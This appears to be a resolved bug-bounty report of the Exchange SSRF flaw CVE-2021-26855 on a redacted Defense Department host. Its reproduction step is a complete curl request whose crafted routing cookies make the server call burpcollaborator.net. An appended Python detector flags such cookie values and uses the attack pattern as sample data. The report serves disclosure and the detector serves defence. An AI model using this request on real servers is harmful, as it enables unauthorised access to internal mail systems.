CVE-2021-26855 on ████████ resulting in SSRF
Critical
U.S. Dept Of Defense
Reported by
spongebhav
Vulnerability Details
Technical details and impact analysis
**Description:**
***CVE-2021-26855*** exists on ***███████*** resulting in SSRF
## References
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855
## Impact
Server-Side Request Forgery
## System Host(s)
███████
## Affected Product(s) and Version(s)
## CVE Numbers
CVE-2021-26855
## Steps to Reproduce
```
curl -i -s -k -X $'GET' \
-H $'Host: █████' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:86.0) Gecko/20100101 Firefox/86.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
-b $'X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3' \
$'https://████████/owa/auth/x.js'
```
OUTPUT:
██████████
## Suggested Mitigation/Remediation Actions
Related CVEs
Associated Common Vulnerabilities and Exposures
CVE-2021-26855
CRITICAL
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Server-Side Request Forgery (SSRF)
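A defender-side check for the cookie pattern in the request under Steps to Reproduce, as an added example that is not part of the original report or of any vendor tooling. It assumes a benign `X-AnonResource-Backend` or `X-BEResource` value has the form `hostname~digits`; the allowlisted host name, the function names and the sample records are constructed for illustration.

```python
import re

ROUTING_COOKIES = ("x-anonresource-backend", "x-beresource")
# Assumption: a benign routing value is "<hostname>~<digits>" and nothing else.
BENIGN_VALUE = re.compile(r"^[A-Za-z0-9.-]+~\d+$")
# Assumption: the backend host names this organisation runs (constructed).
KNOWN_BACKENDS = {"exch01.corp.example"}

def parse_cookies(header):
    """Split a Cookie header into a {lowercased name: value} dict."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep and name:
            cookies[name.lower()] = value
    return cookies

def inspect_cookie(header):
    """Return findings for one Cookie header; an empty list means clean."""
    findings = []
    cookies = parse_cookies(header)
    for name in ROUTING_COOKIES:
        value = cookies.get(name)
        if value is None:
            continue
        host = value.split("~", 1)[0].lower()
        if not BENIGN_VALUE.match(value):
            findings.append(f"{name}: value is not host~digits: {value!r}")
        elif host not in KNOWN_BACKENDS:
            findings.append(f"{name}: unknown backend host {host!r}")
    return findings

# Constructed sample records: (request path, Cookie header).
SAMPLES = [
    ("/owa/auth/x.js", "X-AnonResource=true; "
     "X-AnonResource-Backend=collab.example.net/ecp/default.flt?~3; "
     "X-BEResource=localhost/owa/auth/logon.aspx?~3"),
    ("/owa/auth/logon.aspx", "X-BEResource=exch01.corp.example~1941962753"),
    ("/owa/auth/x.js", "X-BEResource=unlisted.example.org~1"),
    ("/owa/", "ClientId=ABC123"),
]

def scan(samples):
    """Return [(path, findings)] for every sample with at least one finding."""
    results = [(path, inspect_cookie(cookie)) for path, cookie in samples]
    return [(path, found) for path, found in results if found]

if __name__ == "__main__":
    for path, found in scan(SAMPLES):
        print(path, found)
```

The same two checks can be applied to web server or reverse-proxy logs that record the Cookie header, with `KNOWN_BACKENDS` replaced by the real backend names.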